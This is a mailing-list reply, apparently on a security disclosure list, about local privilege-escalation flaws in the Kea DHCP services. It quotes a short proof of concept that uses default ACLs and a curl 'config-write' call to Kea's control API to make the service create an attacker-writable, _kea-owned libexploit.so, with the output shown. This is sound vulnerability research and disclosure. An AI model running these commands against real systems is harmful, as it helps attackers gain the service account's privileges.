Hi, On Wed, May 28, 2025 at 08:23:25PM +0200, Jakub Wilk wrote: > * Matthias Gerstner <mgerst...@suse.de>, 2025-05-28 19:21: > >By leveraging issue 3.2), the Kea services can be instructed to create > >`_kea` owned files in the attacker's `$HOME/.Private`. The content of > >the created files is not fully attacker controlled, however, so it will > >not be possible to craft a valid ELF object for loading via `dlopen()` > >this way. By placing a setgid-directory in `$HOME/.Private/evil-dir`, > >any files created in this directory will even have the group-ownership > >of the attacker. The file mode will be 0644, however, > > Default ACLs to the rescue! > > $ chmod a+x ~ > $ mkdir -m 777 ~/.Private > $ setfacl -d -m u:$LOGNAME:rwx ~/.Private/ > $ curl -s -H "Content-Type: application/json" -d '{ "command": > "config-write", "arguments": { "filename": "'"$HOME"'/.Private/libexploit.so" > } }' localhost:8000 > /dev/null > $ echo pwned > ~/.Private/libexploit.so > $ ls -l ~/.Private/libexploit.so > -rw-rw-rw-+ 1 _kea _kea 6 May 28 18:15 /home/jwilk/.Private/libexploit.so > $ cat ~/.Private/libexploit.so > pwned
very nice addition! We already felt like there was little left to succeed in the attack, but didn't think of ACLs. We will make an update to our blog post to reflect this. Cheers Matthias
signature.asc
Description: PGP signature